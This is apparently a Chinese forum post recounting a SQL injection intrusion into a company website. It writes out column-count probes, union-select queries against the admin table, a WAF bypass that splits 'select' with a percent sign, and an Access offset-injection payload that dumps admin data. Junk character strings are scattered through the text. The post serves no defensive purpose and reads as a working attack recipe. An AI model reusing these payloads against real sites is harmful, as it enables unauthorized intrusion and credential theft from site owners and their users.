打开网站,一个企业站。
# d; i/ Q; ]' `7 r c* r2 y
1 f [7 A2 a3 M1 g+ |
h* C# f8 R2 J3 @2 d8 r顺手加个admin4 r' H# u5 t6 }# r3 S! U
7 ^& T% _: _3 z( p& ~0 S9 U
9 y# ?8 s" B1 O! W3 _- C8 o默认后台。
, C* Z+ b M0 F# h, C+ \回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
7 W a/ y) c2 {9 D+ ~) l p
$ w* B6 ~' @* Z9 u, h0 z
( u! L- ^4 y5 ]# {
2 [) L, R! L/ V5 L- W: Q# ~所以就不用御剑扫了,待会直接封IP。6 p0 t$ t$ B% ^* d$ i- f- v; |
# s" W) V5 D+ f6 n0 `6 ^用order by语句判断是否存在注入。
4 p* ^% D# S; z( v1 y6 ]http://www.xxx.com /product_show.asp?id=997 order by 1
O- W* o8 p( h, W& s% w7 v* xhttp://www.xxx.com /product_show.asp?id=997 order by 100
: L1 v9 U7 ]& f, w现在存在注入,经测试后发现是9个字段。
0 e( A+ m- G$ }+ {, Q }5 h% a( |' u # a9 R: \1 T3 Z& T# J) f
接下来进行联合查询,猜是否存在admin表。$ V K) n+ d- l) Y1 a
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。; Z0 X; ~3 n# V8 w& Z- r5 d
1 P, q( Y) `0 u! m5 |
2 J( ]3 N2 s( U* c4 m6 I/ _$ R0 Z; P! M& ?; {8 M
在select中间加个%,se%lect绕过安全狗。) Q: w v4 n+ s4 w
% C4 M1 W# D6 M! t8 |2 W
! T$ S* q* _% }% u2 `. A* R发现存在admin表,然后开始手工猜常用的字段。+ q7 ~( ^2 y( d. { Q" e
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。7 b* [0 b1 C! S4 {6 @
2 ^6 b5 y0 h9 b. N* f, D. N: F; r
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
" Q" H4 a/ }5 y( t, Z! V& C8 z 5 H1 L* N) \: ]$ ]. X7 _
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。; k) Q( v2 @/ [* S; i
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
4 X8 P, L; R2 v' t$ G好了,敏感内容出显了。, N- t5 ?/ _" L6 |
- X3 f' | u. e4 e+ l
" ^8 |: S4 }2 z( D4 h/ O9 n- {/ K
|